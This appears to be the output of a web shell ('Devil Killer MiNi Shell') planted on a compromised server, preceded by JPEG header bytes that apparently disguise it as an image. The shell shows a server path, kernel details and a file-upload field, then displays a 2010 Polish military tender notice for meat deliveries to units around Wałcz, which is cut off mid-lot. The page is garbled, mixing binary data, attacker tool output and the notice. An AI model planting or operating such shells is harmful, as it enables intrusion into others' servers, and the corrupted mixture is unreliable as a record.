JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100608/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100608/145923-N-2010.html

<p class="kh_header"><b>Wałcz: Dostarczanie wędlin z mięsa czerwonego, wędlin z mięsa drobiowego, konserw mięsnych do jednostek wojskowych i ośrodków szkolenia poligonowego</b><br>
<b>Numer ogłoszenia: 145923 - 2010; data zamieszczenia: 08.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 1906 , ul. Ciasna 7, 78-601 Wałcz, woj. zachodniopomorskie, tel. 067 2502184, faks 067 2502184, 2502971.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.2rbm.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostarczanie wędlin z mięsa czerwonego, wędlin z mięsa drobiowego, konserw mięsnych do jednostek wojskowych i ośrodków szkolenia poligonowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wędliny z mięsa czerwonego: pasztetowa, salceson włoski, salceson ozorkowy, kaszanka z kaszy gryczanej, kiełbasa szynkowa wołowa specjalna, kiełbasa myśliwska, kiełbasa jałowcowa, kiełbasa parówkowa specjalna, parówki specjalne, mortadela specjalna, kiełbasa biała parzona specjalna, kiełbasa podlaska specjalna, kiełbasa wojskowa specjalna, kiełbasa śląska specjalna, kiełbasa toruńska specjalna, kiełbasa zwyczajna specjalna, kiełbasa krakowska parzona specjalna, kiełbasa szynkowa wieprzowa specjalna, kiełbasa krakowska sucha specjalna, kiełbasa żywiecka, kabanosy, baleron, polędwica wędzona wieprzowa, szynka wędzona, szynka gotowana, szynka mielona, szynka konserwowa, boczek wędzony parzony b/k
Wędliny drobiowe: parówki drobiowe, szynka drobiowa, szynka z indyka, mortadela drobiowa
Konserwy mięsne: łopatka konserwowa, szynka konserwowa, pasztet z indyka

Szacunkowa wartość zamówienia (bez VAT): 478 082,18zł..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5, 15.13.11.34-3, 15.13.12.10-0, 15.13.10.00-5, 15.13.12.00-7, 15.13.11.35-0, 15.13.15.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający żąda wniesienia wadium na cały przedmiot zamówienia, w wysokości 
4 782,00 zł.
2.	Zamawiający żąda na poszczególne zadania, wadium w kwotach:
 zadanie nr 1 -    1 212,00  zł.
 zadanie nr 2 -    1 183,00  zł. 
 zadanie nr 3 -    1 220,00  zł.
 zadanie nr 4 -         83,00  zł.
 zadanie nr 5 -       111,00  zł.
 zadanie nr 6 -       141,00  zł. 
 zadanie nr 7 -       134,00  zł.
 zadanie nr 8 -       316,00  zł.
 zadanie nr 9 -       332,00  zł.
 zadanie nr 10 -       50,00  zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział Wykonawcy, którzy wykażą spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych:
1.posiadają obowiązującą decyzję administracyjną właściwego powiatowego lekarza weterynarii w sprawie zatwierdzania, warunkowego zatwierdzania albo przedłużania warunkowego zatwierdzania zakładów, zgodnie z art. 20 ust. 1 pkt 2 ustawy z dnia 16 grudnia 2005r. o produktach pochodzenia zwierzęcego (Dz. U. z 2006 r. Nr 17, poz. 127 ze zm.) 
lub 
obowiązującą decyzję administracyjną właściwego organu Państwowej Inspekcji Sanitarnej w sprawie zatwierdzania, warunkowego zatwierdzania, przedłużania warunkowego zatwierdzania zakładów, które produkują lub wprowadzają do obrotu żywność pochodzenia nie zwierzęcego lub wprowadzają do obrotu produkty pochodzenia zwierzęcego, nie objęte urzędową kontrolą organów Inspekcji Weterynaryjnej, zgodnie z art. 62 ust.1 pkt 2 ustawy o bezpieczeństwie żywności i żywienia (Dz. U. z 2006 r. nr 171, poz. 1225 ze. zm.)
lub
zaświadczenie o wpisie do rejestru zakładów zgodne z rozporządzeniem Ministra Zdrowia   z dnia  29 maja 2007 r., w sprawie wzorów dokumentów dotyczących rejestracji i zatwierdzania zakładów  produkujących lub wprowadzających do obrotu żywność podlegających urzędowej kontroli  Państwowej Inspekcji Sanitarnej (Dz. U. z  2007 r. Nr 106, poz. 730).
2.posiadają zgłoszoną działalność gospodarczą w zakresie produkcji, składowania, konfekcjonowania i obrotu artykułami rolno - spożywczymi do Wojewódzkiego Inspektora Jakości Handlowej Artykułów Rolno - Spożywczych, zgodnie z art. 12 ustawy z dnia 21 grudnia 2000 r. o jakości handlowej artykułów rolno - spożywczych ( Dz. U. z 2005 r. Nr 187, poz. 1577 ze zm.)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział Wykonawcy, którzy wykażą spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych:
przedstawią w dniu podpisania umowy opłaconą polisę ubezpieczeniową od odpowiedzialności cywilnej (deliktowej) z rozszerzonym zakresem ubezpieczenia od odpowiedzialności cywilnej ubezpieczonego za szkody osobowe lub rzeczowe wyrządzone przez produkty dostarczone przez Wykonawcę. Wartość polisy winna być równa lub wyższa wartości zawieranej umowy. W przypadku braku polisy inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności w zakresie i wartości określonym w niniejszym punkcie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez zamawiającego zamawiający żąda:
1. potwierdzenia wdrożonego systemu HACCP w jednej z następujących form: 
- certyfikatu systemu HACCP wydanego przez firmy posiadające akredytacje i uprawnienia Polskiego Centrum Akredytacji z siedzibą w Warszawie lub krajowej organizacji akredytacyjnej dla danego kraju albo
- zaświadczenie właściwego organu Państwowej Inspekcji Sanitarnej lub organu Inspekcji Weterynaryjnej o sprawowaniu nadzoru nad stosowaniem zasad wdrożonego sytemu HACCP. Przedłożone zaświadczenie winno potwierdzać, że Wykonawca wdrożył oraz stosuje zasady systemu HACCP - podstawa prawna art. 59 i 73 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2006 Nr 171 poz. 1225.),
2. oświadczenia o przedłożeniu w dniu podpisania umowy świadectwa jakości handlowej oferowanego produktu, wydanego przez uprawniony podmiot do kontroli jakości handlowej artykułów rolno-spożywczych (w rozumieniu ustawy z dnia 21 grudnia 2000 r. o jakości handlowej artykułów rolno-spożywczych), tj. Wojewódzki Inspektorat Jakości Handlowej Artykułów Rolno-Spożywczych (WIJHARS)  zgodnie z Rozdziałem VIII ust. IV lit. a,
3. oświadczenia, że dostarczany przedmiot zamówienia odpowiada wymaganiom zamieszczonym w załączniku Nr 1 do SIWZ, zatytułowanym Szczegółowy opis przedmiotu zamówienia</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych przewiduje możliwość wprowadzenia istotnych zmian do treści zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, jeżeli one dotyczą: 
a) zmiany świadczenia Wykonawcy na świadczenie lepszej jakości przy zachowaniu   tożsamości przedmiotu zamówienia,
b) zmiany danych Wykonawcy ( np. zmiana siedziby, adresu, nazwy),
c) zmniejszenie ilości, wartości i częstotliwości dostaw w stosunku do ilości, wartości i częstotliwości przyjętych w umowie.
d) zmiany stawki podatku VAT w zakresie przedmiotu zamówienia w wypadku ustawowych zmian w tym zakresie,
e) podwykonawcy uczestniczącego w realizacji umowy, w wypadku, kiedy Wykonawca określi go co do tożsamości w ofercie</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.2rbm.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> JW 1906 Wałcz, ul. Ciasna 7, 78-601 Wałcz.Dokumenty odpłatne 20 pln za zaliczeniem pocztowym, 10 pln odebrane osobiście w JW 1906. Prośbę o SIWZ przesłać na adres JW 1906 lub fax 672502184.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.06.2010 godzina 10:30, miejsce: Oferty należy składać w Kancelarii jawnej - budynek nr 1, pokój nr 4. Komisyjne otwarcie ofert nastąpi w siedzibie Zamawiającego - sala odpraw budynek nr 2 w dniu 16.06.2010 r. godz. 11:00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostarczanie wędlin z miesa czerwonego do jednostek wojskowych z rejonu:Mostów, Stargardu Szczecińskiego, Szczecina, Kobylanki, Dziwnowa i Świnoujcia..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wędliny z mięsa czerwonego: pasztetowa, salceson włoski, salceson ozorkowy, kaszanka z kaszy gryczanej, kiełbasa szynkowa wołowa specjalna, kiełbasa myśliwska, kiełbasa jałowcowa, kiełbasa parówkowa specjalna, parówki specjalne,
mortadela specjalna, kiełbasa biała parzona specjalna, kiełbasa podlaska specjalna, kiełbasa wojskowa specjalna, kiełbasa śląska specjalna, kiełbasa toruńska specjalna, kiełbasa zwyczajna specjalna, kiełbasa krakowska parzona specjalna, kiełbasa szynkowa wieprzowa specjalna, kiełbasa krakowska sucha specjalna, kiełbasa żywiecka, kabanosy, baleron, polędwica wędzona wieprzowa, szynka wędzona, szynka gotowana

Szacunkowa wartość zamówienia (bez VAT): 121 177,23 zł..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5, 15.13.11.34-3, 15.13.12.10-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostarczanie wędlin z miesa czerwonego do jednostek wojskowych z rejonu: Koszalina, Słupska, Trzebiatowa, Ustki, Koszalina oraz Poligonu Wicko Morskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wędliny z mięsa czerwonego: pasztetowa, salceson włoski, salceson ozorkowy, kiełbasa myśliwska, kiełbasa jałowcowa, kiełbasa parówkowa specjalna, parówki specjalne, mortadela specjalna, kiełbasa biała parzona specjalna, kiełbasa podlaska specjalna, kiełbasa śląska specjalna, kiełbasa toruńska specjalna, kiełbasa zwyczajna specjalna, kiełbasa krakowska parzona specjalna, kiełbasa szynkowa wieprzowa specjalna, kiełbasa krakowska sucha specjalna, kiełbasa żywiecka, kabanosy, baleron, polędwica wędzona wieprzowa, szynka wędzona, szynka gotowana, szynka mielona, szynka konserwowa, boczek wędzony parzony b/k

Szacunkowa wartość zamówienia (bez VAT): 118 311,38 zł..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5, 15.13.11.34-3, 15.13.12.10-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostarczanie wędlin z miesa czerwonego do jednostek wojskowych z rejonu: Złocieńca, Oleszna, Świdwina, Mirosławca, Wałcza, Czarnego oraz Poligonu Drawskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wędliny z mięsa czerwonego: pasztetowa, salceson włoski, salceson ozorkowy, kaszanka z kaszy gryczanej, kiełbasa szynkowa wołowa specjalna, kiełbasa myśliwska, kiełbasa parówkowa specjalna, parówki specjalne, mortadela specjalna
kiełbasa biała parzona specjalna, kiełbasa podlaska specjalna, kiełbasa śląska specjalna, kiełbasa toruńska specjalna, kiełbasa zwyczajna specjalna, kiełbasa krakowska parzona specjalna, kiełbasa szynkowa wieprzowa specjalna, kiełbasa krakowska sucha specjalna, kiełbasa żywiecka, kabanosy, polędwica wędzona wieprzowa, szynka wędzona, szynka gotowana, szynka mielona, szynka konserwowa, boczek wędzony parzony b/k

Szacunkowa wartość zamówienia (bez VAT): 121 976, 87 zł..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5, 15.13.11.34-3, 15.13.12.10-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostarczanie wędlin z miesa drobiowego do jednostek wojskowych z rejonu: Szczecina, Kobylanki, Stargardu Szczecińskiego i Świnoujścia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wędliny drobiowe: parówki drobiowe, szynka drobiowa, szynka z indyka, mortadela drobiowa

Szacunkowa wartość zamówienia (bez VAT): 8 344,72 zł..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.35-0, 15.13.15.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostarczanie wędlin z miesa drobiowego do jednostek wojskowych z rejonu: Trzebiatowa, Ustki, Koszalin oraz Poligonu Wicko Morskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wędliny drobiowe: parówki drobiowe, szynka drobiowa, szynka z indyka

Szacunkowa wartość zamówienia (bez VAT): 11 103,31 zł..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.35-0, 15.13.15.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostarczanie wędlin z miesa drobiowego do jednostek wojskowych z rejonu: TrzebiatowaZłocińca, Oleszna, Świdwina, Mirosławca, Wałcza, Czarnego oraz Poligonu Drawskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wędliny drobiowe: parówki drobiowe, szynka drobiowa, szynka z indyka, mortadela drobiowa

Szacunkowa wartość zamówienia (bez VAT): 14 083,27 zł..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.35-0, 15.13.15.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostarczanie konserw miesnych do jednostek wojskowych z rejonu: Mostów, Szczecina, Kobylanki, Dziwnowa i Stargardu Szczecińskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konserwy mięsne: łopatka konserwowa, szynka konserwowa i pasztet z indyka

Szacunkowa wartość zamówienia (bez VAT): 13 370,20 zł..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.10.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Dostarczanie konserw miesnych do jednostek wojskowych z rejonu: Słupska, Trzebiatowa, Ustki oraz Poligonu Wicko Morskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konserwy mięsne: łopatka konserwowa, szynka konserwowa i pasztet z indyka

Szacunkowa wartość zamówienia (bez VAT): 31 575,30 zł..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.10.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Dostarczanie konserw miesnych do jednostek wojskowych z rejonu: Złocieńca, Świdwina, Wałcza, Czarnego oraz Poligonu Drawskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konserwy mięsne: łopatka konserwowa, szynka konserwowa i pasztet z indyka

Szacunkowa wartość zamówienia (bez VAT): 33 184,50 zł..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.10.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Dostarczanie konserw miesnych do jednostek wojskowych z rejonu Poznania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konserwy mięsne: łopatka konserwowa, szynka konserwowa, pasztet z indyka

